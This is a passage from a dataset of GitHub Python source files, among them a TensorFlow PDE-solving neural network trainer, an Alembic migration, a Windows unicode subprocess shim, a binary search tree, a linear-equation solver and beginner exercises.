\"CL\", \"LCL\"]:\n training_fun(i)\n test_fun(i)","repo_name":"gusauriemo/Final-Year-Project","sub_path":"analysis of results.py","file_name":"analysis of results.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72379734887","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 18 15:17:47 2020\n\n@author: Vicky\n\n\nNeural PDE - Tensorflow 2.X\nModule : Model\n\nTraining Ground Class which houses all the associated training functions - loss functions, gradient functions, callbacks, training loops and evaluation functions \n\"\"\"\nimport time\nimport numpy as np\nimport tensorflow as tf\n\nfrom .network import Network\nfrom .pde import PDE\nfrom . import boundary_conditions\nfrom .sampler import Sampler\nfrom . import options \nfrom . import qnw\n\nclass TrainingGround(Network, Sampler, PDE):\n \n def __init__(self, layers, lb, ub, activation, initializer, BC, BC_Vals, N_f, network_type, pde_func, eqn_str, in_vars, out_vars, sampler):\n \"\"\"\n \n\n Parameters\n ----------\n layers : LIST\n Nunmber of neurons in each layer\n lb : ARRAY\n Lower Range of the time and space domain\n ub : ARRAY\n Upper Range of the time and space domain\n activation : STR\n Name of the activation Function\n initializer : STR\n Name of the Initialiser for the neural network weights\n N_f : INT\n Number of points sampled from the domain space.\n pde_func : FUNC\n Explcitly defined domain function.\n eqn_str : STR\n The PDE in string with the specified format.\n in_vars : INT\n Number of input variables.\n out_vars : INT\n Number of output variables.\n\n Returns\n -------\n None.\n\n \"\"\"\n \n Network.__init__(self, layers, lb, ub, activation, initializer)\n Sampler.__init__(self, N_f, subspace_N = int(N_f/10)) #Percentage to be sammpled from the subspace. \n PDE.__init__(self, eqn_str, in_vars, out_vars)\n \n self.layers = layers \n self.input_size = self.layers[0]\n self.output_size = self.layers[-1]\n \n self.bc = boundary_conditions.select(BC)\n \n if network_type == 'Regular':\n self.model = Network.initialize_NN(self)\n elif network_type == 'Resnet':\n self.model = Network.initialize_resnet(self, num_blocks=2)\n else:\n raise ValueError(\"Unknown Network Type. It should be either 'Regular' or 'Resnet'\")\n\n self.trainable_params = self.model.trainable_weights\n\n \n self.pde = PDE.func #Implicit \n # self.pde = pde_func #Explicit\n \n self.loss_list =[]\n self.sampler = sampler\n \n #Explicit\n # def pde_func(self, X):\n # pde_loss = self.pde(self.model, X)\n # return pde_loss\n\n\n \n def ic_func(self, X, u):\n u_pred = self.model(X, training=True)\n ic_loss = u_pred - u\n return ic_loss\n\n \n def bc_func(self, X, u):\n bc_loss = self.bc(self.model, X, u)\n return bc_loss\n \n #Implicit\n def pde_func(self, X):\n pde_loss = self.pde(self, X)\n return pde_loss\n \n \n \n def loss_func(self, X_i, u_i, X_b, u_b, X_f):\n \n initial_loss = self.ic_func(X_i, u_i)\n boundary_loss = self.bc_func(X_b, u_b)\n domain_loss = self.pde_func(X_f)\n \n return tf.reduce_mean(tf.square(initial_loss)) + \\\n tf.reduce_mean(tf.square(boundary_loss)) + \\\n tf.reduce_mean(tf.square(domain_loss))\n \n @tf.function\n @tf.autograph.experimental.do_not_convert\n def loss_and_gradients(self, X_i, u_i, X_b, u_b, X_f):\n \"\"\"\n \n\n Parameters\n ----------\n X_i : NUMPY ARRAY\n Initial input points.\n u_i : NUMPY ARRAY\n Initial outputs.\n X_b : NUMPY ARRAY\n Boundary input points.\n u_b : NUMPY ARRAY\n Boundary outputs.\n X_f : NUMPY ARRAY\n Domain input points.\n\n Returns\n -------\n model_loss : TENSOR\n Sum of Initial, Boundary and Domain MSE loss\n model_gradients : TENSOR\n Loss gradient with respect to thge model trainable params. \n\n \"\"\"\n with tf.GradientTape() as tape:\n model_loss=self.loss_func(X_i, u_i, X_b, u_b, X_f)\n model_gradients = tape.gradient(model_loss, self.trainable_params)\n return model_loss, model_gradients\n \n def callback_GD(self, it, loss_value):\n elapsed = time.time() - self.init_time\n self.loss_list.append(loss_value)\n print('GD. It: %d, Loss: %.3e, Time: %.2f' % \n (it, loss_value, elapsed))\n self.init_time = time.time()\n \n \n \n def train(self, train_config, train_data):\n start_time = time.time()\n \n optimizer, kind = options.get_optimizer(name=train_config['Optimizer'], lr=train_config['learning_rate'])\n nIter = train_config['Iterations']\n \n \n X_i = train_data['X_i']\n u_i = train_data['u_i']\n X_b = train_data['X_b']\n u_b = train_data['u_b']\n X_f = train_data['X_f']\n \n \n self.init_time = time.time()\n \n if kind == \"GD\":\n if self.sampler == 'Initial':\n nIter_2 = nIter\n else :\n nIter_2 = int(nIter/2)\n \n for it in range(nIter):\n \n model_loss, model_gradients = self.loss_and_gradients(X_i, u_i, X_b, u_b, X_f)\n optimizer.apply_gradients(zip(model_gradients, self.trainable_params))\n \n if it%10 == 0:\n self.callback_GD(it, model_loss)\n \n # if self.sampler == 'Residual': \n # X_f_sampled = Sampler.str_sampler(self)\n # # X_f_sampled = tf.concat([X_f, X_f_sampled], axis=0)\n # X_f_sampled = np.vstack((X_f, X_f_sampled))\n \n # for it in range(nIter_2, nIter):\n \n # if it %500 ==0:\n # X_f_sampled = Sampler.str_sampler(self)\n # # X_f_sampled = tf.concat([X_f, X_f_sampled], axis=0)\n # X_f_sampled = np.vstack((X_f, X_f_sampled))\n \n # model_loss, model_gradients = self.loss_and_gradients(X_i, u_i, X_b, u_b, X_f_sampled)\n # optimizer.apply_gradients(zip(model_gradients, self.trainable_params))\n \n # if it%10 == 0:\n # self.callback_GD(it, model_loss)\n \n # elif self.sampler == 'Uniform':\n # X_f_sampled = Sampler.uniform_sampler(self)\n \n # for it in range(nIter_2, nIter):\n \n # if it %500 ==0:\n # X_f_sampled = Sampler.uniform_sampler(self)\n \n # model_loss, model_gradients = self.loss_and_gradients(X_i, u_i, X_b, u_b, X_f_sampled)\n # optimizer.apply_gradients(zip(model_gradients, self.trainable_params))\n \n # if it%10 == 0:\n # self.callback_GD(it, model_loss)\n \n elif kind == \"QN_Scipy\":\n \n func = qnw.Scipy_Keras_Wrapper(self.model, self.loss_func, X_i, u_i, X_b, u_b, X_f)\n # convert initial model parameters to a 1D tf.Tensor\n init_params = tf.dynamic_stitch(func.idx, self.model.trainable_variables)\n \n trained_variables = optimizer(fun=func,\n x0=init_params,\n jac=True,\n method = train_config['Optimizer'])\n \n func.assign_new_model_parameters(trained_variables.x)\n\n\n elif kind == \"QN_TFP\":\n \n func = qnw.TFP_Keras_Wrapper(self.model, self.loss_func, X_i, u_i, X_b, u_b, X_f)\n # convert initial model parameters to a 1D tf.Tensor\n init_params = tf.dynamic_stitch(func.idx, self.model.trainable_variables)\n \n trained_variables = optimizer(value_and_gradients_function=func,\n initial_position=init_params,\n max_iterations=500)\n \n func.assign_new_model_parameters(trained_variables.position)\n \n end_time = time.time() - start_time \n return end_time\n \n \n def predict(self, X):\n return self.model(X).numpy()\n \n \n def retrain(self, model, train_config, train_data):\n self.model = model\n self.trainable_params = self.model.trainable_variables\n \n return self.train(train_config, train_data)","repo_name":"gitvicky/tf-pde","sub_path":"tfpde/training_ground.py","file_name":"training_ground.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24580072692","text":"# quokkaCMD.py\n# 파일과 폴더를 엿보는 프로그램 (파일 탐색기)\n\nimport os\n\n# 현재 스크립트 파일의 절대 경로 \ncurrent_directory_path = os.path.dirname(os.path.abspath(__file__))\nprint(f\"script executing path : {current_directory_path}\")\n\n# 작업 디렉터리를 현재 스크립트 파일이 있는 디렉터리로 변경 \nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\nos.system(\"dir\") # dir : 파일 리스트 출력 시스템 명령어\nos.system(\"pause\") # pause : 사용자가 키를 누를 때까지 일시 중지 \n","repo_name":"circleolami/grape_quokka-the-rat","sub_path":"legacy/quokkaCMD.py","file_name":"quokkaCMD.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33298750118","text":"\"\"\"\r\nVery simple toy demonstrating \r\na very simple case of bias/variance trade-off.\r\n\r\nCheck for companion file index.html nearby.\r\n\r\nBrowser complains about coding line, removed:\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nabout_str = \"\"\"Using Brython to construct a very simple toy \r\ndemonstrating a very simple case of \r\nbias/variance trade-off.\r\n\r\nAesthetics to be taken care of some day.\r\n\r\nJosé L Balcázar (balqui at BitBucket or GitHub)\r\n2018\"\"\"\r\n\r\nfrom browser import document, alert, html # Brython in-browser support\r\nfrom random import gauss\r\n\r\ndef about():\r\n\talert(about_str)\r\n\r\ndef start(event):\r\n\t\"get parameter values and reinitialize data\"\r\n\tmean = float(document[\"mean\"].value)\r\n\tstdev = float(document[\"stdev\"].value)\r\n\tssize = int(document[\"ssize\"].value)\r\n\tdecs = 6 # max of decimal places to test\r\n\r\n\tdocument['approxmean'].text = \"\"\r\n\tdocument['samplevalues'].text = \"\"\r\n\r\n\td = []\r\n\tfor i in range(ssize):\r\n\t\td.append(gauss(mean,stdev))\r\n\ts = sum(d)\r\n\r\n#\ts = 0\r\n#\tfor e in d:\r\n#\t\t#print e\r\n#\t\ts += e\r\n\r\n\tfor p in range(0,decs):\r\n\t\tform = \"%%1.%df\" % p\r\n\t\t#print form % (s/len(d))\r\n\t\tdocument['approxmean'] <= html.P(form % (s/len(d)))\r\n\r\n\tfor e in d:\r\n\t\tdocument['samplevalues'] <= html.P(str(e))\r\n\r\n# main program: \r\n# bind buttons to processes and leave everything for Brython to care for.\r\n\r\ndocument['aboutbutton'].bind('click', about)\r\n\r\ndocument['samplebutton'].bind('click', start)\r\n\r\n\r\n","repo_name":"balqui/BiasVarianceTradeOffDemo","sub_path":"BVT.py","file_name":"BVT.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6995505096","text":"# Curso intensivo de Python\n#\n# Exercício 8.7-Álbum: Escreva uma função chamada make_album() que construa um dicionário descrevendo um\n# álbum musical. A função deve aceitar o nome de um artista e o título de um álbum e deve devolver um\n# dicionário contendo essas duas informações. Use a função para criar três dicionários que representem\n# álbuns diferentes. Apresente cada valor devolvido para mostrar que os dicionários estão armazenando as\n# informações do álbum corretamente. Acrescente um parâmetro opcional em make_album() que permita armazenar\n# o número de faixas em um álbum. Se a linha que fizer a chamada incluir um valor para o número de faixas,\n# acrescente esse valor ao dicionário do álbum. Faça pelo menos uma nova chamada da função incluindo o\n# número de faixas em um álbum.\n\ndef make_album(nome, titulo, faixas=\"\"):\n \"\"\"Devolve um dicionário com informações sobre um album musical\"\"\"\n album_musical = {\n \"nome\": nome,\n \"titulo\": titulo,\n }\n if faixas:\n album_musical[\"faixas\"] = faixas\n return album_musical\n\nalbum_1 = make_album(\"System of a Down\", \"Hipnotize\")\nprint(album_1)\n\nalbum_2 = make_album(\"System os a Down\", \"Steal this album!\")\nprint(album_2)\n\nalbum_3 = make_album(\"Foo Fighters\", \"Echoes, Silence, Patience & Grace\")\nprint(album_3)\n\nalbum_4 = make_album(\"Iron Maiden\", \"Fear of the Dark\", 12)\nprint(album_4)","repo_name":"AndersonShermann/Python","sub_path":"Cap8-Funcoes/exercicio8.7.py","file_name":"exercicio8.7.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5549869508","text":"# name = \"Ugain jain\"\n# salutation = \"Mr.\"\n# full_name = salutation + \" \"+ name\n# age = 21\n# rating = 3.8\n# status = \"Crazy me....\"\n\n# spy = {\"name\": \"Ugain\", \"Salutation\": \"Mr\", \"age\": 21, \"Rating\": 3.8, \"Status\": \"CRazy mee....\"}\nfrom datetime import datetime\n\n\nclass Spy:\n\n def __init__(self, name, salutation, age, rating):\n self.name = name\n self.salutation = salutation\n self.age = age\n self.rating = rating\n self.is_online = True\n self.chats = []\n self.current_status_message = None\n\n\nclass ChatMessage:\n def __init__(self, spy_name, friend_name, message, time, sent_by_me):\n self.spy_name = spy_name\n self.friend_name = friend_name\n self.message = message\n self.sent_by_me = sent_by_me\n self.time = time\n\n\n\nspy = Spy(\"Ugain\", \"Mr.\", 21, 4)","repo_name":"UgainJain/SpyChat","sub_path":"spy_details.py","file_name":"spy_details.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2262420504","text":"\"\"\"empty message\n\nRevision ID: 3d8ce78f7e4\nRevises: None\nCreate Date: 2015-03-07 18:28:19.469762\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3d8ce78f7e4'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), nullable=False),\n sa.Column('email', sa.String(length=255), nullable=False),\n sa.Column('encrypted_password', sa.String(length=60), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('task',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=255), nullable=False),\n sa.Column('description', sa.String(length=255), nullable=True),\n sa.Column('status', sa.String(length=255), nullable=True),\n sa.Column('due_date', sa.String(length=40), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.Column('assigned_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['assigned_id'], ['user.id'], ),\n sa.ForeignKeyConstraint(['owner_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('task')\n op.drop_table('user')\n ### end Alembic commands ###\n","repo_name":"reserve-sienna/coaction","sub_path":"migrations/versions/3d8ce78f7e4_.py","file_name":"3d8ce78f7e4_.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28666179959","text":"import unittest\nimport lambdaLib\n\n\n\nclass TestStringMethods(unittest.TestCase):\n # def setUp(self):\n # self.txt = lambdaLib.getData()\n\n def test_get_data(self):\n txt = lambdaLib.getData()\n self.assertEqual(txt[0:6], '[info]')\n\n def test_time_ranges(self):\n text = \"21:51:02.668 [sca-execon-co aramers$-ihu}!2]*21:51:12.082 [scal21:51:24.950\"\n timeRanges = lambdaLib.findTimePeriod(text)\n self.assertEqual(timeRanges, ['21:51:02.668', '21:51:12.082', '21:51:24.950'])\n\n def test_datetime_convert(self):\n time = lambdaLib.datetime_convert(\"21:51:02\")\n self.assertEqual(time.hour, 21)\n self.assertEqual(time.minute, 51)\n self.assertEqual(time.second, 2)\n\n def test_datetime_c(self):\n t1 = lambdaLib.datetime_convert(\"19:51:22\")\n t2 = lambdaLib.datetime_convert(\"21:48:03\")\n self.assertTrue(lambdaLib.is_in_range(t1, t2))\n self.assertFalse(lambdaLib.is_in_range(t2, t1))\n\n def test_split(self):\n ta = [\"[info]\",\"[warn]\",\"21:51:01.824\",\"[success]\"]\n size = len(lambdaLib.remove_front_nonlog(ta))\n self.assertEqual(size, 2)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"Carpk/aws-lambda-grpc-sample","sub_path":"lambda/lambdaTest.py","file_name":"lambdaTest.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70038719848","text":"import datetime\n\nclass Animation(object):\n def __init__(self, smiley):\n \"\"\" Smiley is an array of frames, see smiley_happy\"\"\"\n self.smiley = smiley\n self.nof_frames = len(self.smiley)\n self.index = 0\n self.timeout = datetime.datetime.now()\n\n def grid_if_update_needed(self):\n now = datetime.datetime.now()\n if now > self.timeout:\n self.index = (self.index + 1) % self.nof_frames\n self.timeout = now + datetime.timedelta(seconds=self.smiley[self.index]['time'])\n return self.smiley[self.index]['smiley']\n return None","repo_name":"jackha/neopixels","sub_path":"python/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8621028946","text":"import sys\n\nsys.path.append(r\"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/\")\nfrom environment_loop import EnvironmentLoop\nfrom Agents.D4PG_new.agent import D4PG\nfrom Agents.D4PG_new.networks import make_default_networks\nfrom Environment.environment import make_environment_spec\nfrom Utilities.FileOperator import load_obj\n\ndef main(_):\n \n # different scenario\n # scneario 1\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_1/global_environment_72604a5e5b364143b36131abaffb8b31.pkl\"\n # scneario 2\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_2/global_environment_f37a4dc9bd164b529324908d12ca5c40.pkl\"\n # scenario 3\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_3/global_environment_96e3e39e202547ce9cfd06dc12604a71.pkl\"\n # scenario 4\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/scenarios/scenario_4/global_environment_a17bdc9ba084473ab50abdc101037a0e.pkl\"\n\n \n # different compuation resources \n # CPU 1-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/1GHz/global_environment_5307f0921f624497a364cdfd1072f393.pkl\"\n # CPU 2-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/2GHz/global_environment_5981cf8e689a476d812ce3357f549493.pkl\"\n # CPU 4-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/4GHz/global_environment_64289740b65c432eaefe6755ec880c52.pkl\"\n # CPU 5-10GHz\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/computation/5GHz/global_environment_53e106efdf0548c5a7e42e1cf0a467d7.pkl\"\n \n # different task number\n # 0.3\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_3/global_environment_c2bca604b01a4fe4b379f45794f4654c.pkl\"\n # 0.4\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_4/global_environment_3a7afa78fe8443e5a5cc208125749166.pkl\"\n # 0.6\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_6/global_environment_6ef83d1602544f9b9fbd255d633a2803.pkl\"\n # 0.7\n # environment_file_name = \"/home/neardws/Documents/Game-Theoretic-Deep-Reinforcement-Learning/Data/task_number/0_7/global_environment_24e747fc18fb4c1da6eb6de2b2581bff.pkl\"\n \n environment = load_obj(environment_file_name)\n\n spec = make_environment_spec(environment)\n \n networks = make_default_networks(spec.actions)\n \n agent = D4PG(\n environment_file=environment_file_name,\n environment_spec=spec,\n networks=networks,\n batch_size=256,\n prefetch_size=4,\n min_replay_size=1000,\n max_replay_size=1000000,\n samples_per_insert=8.0,\n n_step=1,\n sigma=0.3,\n discount=0.996,\n target_update_period=100,\n )\n \n loop = EnvironmentLoop(environment, agent)\n loop.run(4100)\n\n","repo_name":"neardws/Game-Theoretic-Deep-Reinforcement-Learning","sub_path":"Experiment/run_d4pg.py","file_name":"run_d4pg.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"53"} +{"seq_id":"15837193361","text":"#filename:stdout_err.py\n#function: show the stdout and stderr\n#stdout, stderr does not add carriage returns for you;\n\nfor i in range(2):\n print ('Brand Asus, HTC in Taiwan') \n\nimport sys\nfor showtimes in range(2):\n sys.stdout.write('Brand Samsung, Apple\\n')\n \nfor showtimes in range(2):\n sys.stderr.write('Brand Samsung, Apple\\n')\n\nprint(\"you can see the color is different between stdout and stderr\")\n","repo_name":"Scott-S-Lin/Python_Programming_ChineseBook","sub_path":"ch5/stdout_err.py","file_name":"stdout_err.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8033707907","text":"import sys\nimport subprocess\n\nimport six\n\nfrom dmoj.utils.unicode import utf8text\n\nif six.PY2 and sys.platform == 'win32':\n import _subprocess\n from types import FunctionType, CodeType\n\n from ctypes import byref, windll, c_void_p, Structure, sizeof, c_wchar, WinError, POINTER\n from ctypes.wintypes import BYTE, WORD, LPWSTR, BOOL, DWORD, LPVOID, HANDLE\n\n CREATE_UNICODE_ENVIRONMENT = 0x00000400\n LPSECURITY_ATTRIBUTES = c_void_p\n LPBYTE = POINTER(BYTE)\n\n\n class STARTUPINFOW(Structure):\n _fields_ = [\n ('cb', DWORD), ('lpReserved', LPWSTR),\n ('lpDesktop', LPWSTR), ('lpTitle', LPWSTR),\n ('dwX', DWORD), ('dwY', DWORD),\n ('dwXSize', DWORD), ('dwYSize', DWORD),\n ('dwXCountChars', DWORD), ('dwYCountChars', DWORD),\n ('dwFillAtrribute', DWORD), ('dwFlags', DWORD),\n ('wShowWindow', WORD), ('cbReserved2', WORD),\n ('lpReserved2', LPBYTE), ('hStdInput', HANDLE),\n ('hStdOutput', HANDLE), ('hStdError', HANDLE),\n ]\n\n\n LPSTARTUPINFOW = POINTER(STARTUPINFOW)\n\n\n class PROCESS_INFORMATION(Structure):\n _fields_ = [\n ('hProcess', HANDLE), ('hThread', HANDLE),\n ('dwProcessId', DWORD), ('dwThreadId', DWORD),\n ]\n\n\n LPPROCESS_INFORMATION = POINTER(PROCESS_INFORMATION)\n\n\n class WindowsHandle(c_void_p):\n \"\"\"Emulate the handle objects in _subprocess.\"\"\"\n\n def __init__(self, *a, **kw):\n super(WindowsHandle, self).__init__(*a, **kw)\n self.closed = False\n\n def Close(self):\n if not self.closed:\n windll.kernel32.CloseHandle(self)\n self.closed = True\n\n def __int__(self):\n return self.value\n\n\n # Using LoadLibrary to avoid our argtypes conflicting.\n CreateProcessW = windll.LoadLibrary('kernel32.dll').CreateProcessW\n CreateProcessW.argtypes = [\n LPWSTR, LPWSTR, LPSECURITY_ATTRIBUTES,\n LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPWSTR,\n LPSTARTUPINFOW, LPPROCESS_INFORMATION,\n ]\n CreateProcessW.restype = BOOL\n\n\n def CreateProcess(executable, args, _p_attr, _t_attr,\n inherit_handles, creation_flags, env, cwd,\n startup_info):\n int_or_none = lambda x: None if x is None else int(x)\n\n si = STARTUPINFOW(\n dwFlags=startup_info.dwFlags,\n wShowWindow=startup_info.wShowWindow,\n cb=sizeof(STARTUPINFOW),\n hStdInput=int_or_none(startup_info.hStdInput),\n hStdOutput=int_or_none(startup_info.hStdOutput),\n hStdError=int_or_none(startup_info.hStdError),\n )\n\n wenv = None\n if env is not None:\n env = (u''.join(u'%s=%s\\0' % (k, v) for k, v in env.items())) + u'\\0'\n wenv = (c_wchar * len(env))()\n wenv.value = env\n\n pi = PROCESS_INFORMATION()\n creation_flags |= CREATE_UNICODE_ENVIRONMENT\n\n if CreateProcessW(executable, args, None, None,\n inherit_handles, creation_flags,\n wenv, utf8text(cwd), byref(si), byref(pi)):\n return (WindowsHandle(pi.hProcess), WindowsHandle(pi.hThread),\n pi.dwProcessId, pi.dwThreadId)\n raise WinError()\n\n\n class FakeSubprocess(object):\n def __getattribute__(self, item):\n if item == 'CreateProcess':\n return CreateProcess\n else:\n return getattr(_subprocess, item)\n\n\n def replace_globals(function, new_globals):\n func_globals = function.func_globals.copy()\n func_globals.update(new_globals)\n return FunctionType(function.func_code, func_globals, function.func_name,\n function.func_defaults, function.func_closure)\n\n\n def replace_consts(function, new_consts):\n code = function.func_code\n consts = tuple(new_consts.get(const, const) for const in code.co_consts)\n new_code = CodeType(code.co_argcount, code.co_nlocals, code.co_stacksize, code.co_flags,\n code.co_code, consts, code.co_names, code.co_varnames, code.co_filename,\n code.co_name, code.co_firstlineno, code.co_lnotab, code.co_freevars,\n code.co_cellvars)\n function.func_code = new_code\n\n\n class Popen(subprocess.Popen):\n _execute_child = replace_globals(subprocess.Popen._execute_child.im_func, {\n '_subprocess': FakeSubprocess(),\n })\n replace_consts(_execute_child, {'{} /c \"{}\"': u'{} /c \"{}\"'})\n\n\n call = replace_globals(subprocess.call, {'Popen': Popen})\n check_call = replace_globals(subprocess.check_call, {'call': call})\n check_output = replace_globals(subprocess.check_output, {'Popen': Popen})\nelse:\n Popen = subprocess.Popen\n call = subprocess.call\n check_call = subprocess.check_call\n check_output = subprocess.check_output\n","repo_name":"alps-jbnu/litmus-judge","sub_path":"dmoj/utils/uniprocess.py","file_name":"uniprocess.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27782514959","text":"class Node:\n def __init__(self, val):\n self.left = None\n self.right = None\n self.val = val\n\nroot = Node(44)\n\nroot.left = Node(17)\nroot.right = Node(88)\nroot.left.left = Node(8)\nroot.left.right = Node(32)\nroot.left.right.left = Node(28)\nroot.left.right.left.right = Node(29)\nroot.right.right = Node(97)\nroot.right.right.left = Node(93)\nroot.right.left = Node(65)\nroot.right.left.left = Node(54)\nroot.right.left.right = Node(82)\nroot.right.left.right.left = Node(76)\nroot.right.left.right.left.left = Node(68)\nroot.right.left.right.left.right = Node(80)\n\ndef search(root, val):\n curr = root\n\n while curr:\n if val == curr.val:\n return curr\n\n if val < curr.val:\n curr = curr.left\n\n else:\n curr = curr.right\n\n return None\n\ndef insert(root, val):\n new = Node(val)\n\n prev = None\n curr = root\n\n while curr is not None:\n if val == curr.val:\n return\n\n if val < curr.val:\n prev = curr\n curr = curr.left\n\n else:\n prev = curr\n curr = curr.right\n\n if val < prev.val:\n prev.left = new\n else:\n prev.right = new\n\n return root\n\nnewroot = insert(root, 33)\n# print(insert(root, 33))\nprint(search(newroot, 33))","repo_name":"n-gibs/dsa","sub_path":"trees/foundation/insertBST.py","file_name":"insertBST.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42464381737","text":"a = float(input())\nb = float(input())\nc = float(input())\nd = float(input())\ne = float(input())\nf = float(input())\n\nepsilon = 10 ** -6\n\naIsZero = abs(a) < epsilon\nbIsZero = abs(b) < epsilon\ncIsZero = abs(c) < epsilon\ndIsZero = abs(d) < epsilon\neIsZero = abs(e) < epsilon\nfIsZero = abs(f) < epsilon\n\nif aIsZero and bIsZero and not eIsZero:\n print(0)\n\nelif cIsZero and dIsZero and not fIsZero:\n print(0)\n\nelif aIsZero and bIsZero and eIsZero:\n if cIsZero and dIsZero and fIsZero:\n print(5)\n elif cIsZero:\n y = f / d\n print(4, y)\n elif dIsZero:\n x = f / c\n print(3, x)\n else:\n p = (-c) / d\n q = f / d\n print(1, p, q)\n\nelif cIsZero and dIsZero and fIsZero:\n if aIsZero:\n y = e / b\n print(4, y)\n elif bIsZero:\n x = e / a\n print(3, x)\n else:\n p = (-a) / b\n q = e / b\n print(1, p, q)\n\nelif aIsZero and cIsZero:\n y1 = e / b\n y2 = f / d\n if abs(y1 - y2) < epsilon:\n print(4, y1)\n else:\n print(0)\n\nelif bIsZero and dIsZero:\n x1 = e / a\n x2 = f / c\n if abs(x1 - x2) < epsilon:\n print(3, x1)\n else:\n print(0)\n\nelif aIsZero and dIsZero:\n x = f / c\n y = e / b\n print(2, x, y)\n\nelif cIsZero and bIsZero:\n x = e / a\n y = f / d\n print(2, x, y)\n\nelif aIsZero:\n y = e / b\n x = (f - d * y) / c\n print(2, x, y)\n\nelif bIsZero:\n x = e / a\n y = (f - c * x) / d\n print(2, x, y)\n\nelif cIsZero:\n y = f / d\n x = (e - b * y) / a\n print(2, x, y)\n\nelif dIsZero:\n x = f / c\n y = (e - a * x) / b\n print(2, x, y)\n\nelif abs(a * d - b * c) < epsilon:\n p1 = (-a) / b\n p2 = (-c) / d\n q1 = e / b\n q2 = f / d\n if abs(p1 - p2) < epsilon and abs(q1 - q2) < epsilon:\n print(1, p1, q1)\n else:\n print(0)\n\nelse:\n y = (a * f - c * e) / (a * d - b * c)\n x = (e - b * y) / a\n print(2, x, y)\n","repo_name":"pavelbrnv/Coursera","sub_path":"PythonBasis/week03/task13.py","file_name":"task13.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29467477263","text":"# Question 1\n\ndef hello_name():\n message = \"Enter Username: \"\n username = input(message)\n return f\"Hello, {username}!\"\nprint(hello_name())\n\n# Question 2\n\ndef first_odds():\n odd_numbers = list(range(1,100,2))\n return odd_numbers\n\nprint (first_odds())\n\n# Question 3\n\ndef max_num_in_list( a_list ): \n max = a_list[ 0 ] \n for a in a_list: \n if a > max: \n max = a \n return max \nprint(max_num_in_list([1, 2, -8, 0])) \n\n# Question 4\n\ndef is_leap_year(a_year):\n if a_year % 400 == 0:\n return True\n if a_year % 100 == 0:\n return False\n if a_year % 4 == 0:\n return True\n else:\n return False\nprint(is_leap_year(2000))\nprint(is_leap_year(2008))\n\n# Question 5\n\ndef is_Consecutive(a_list):\n return sorted(a_list) == 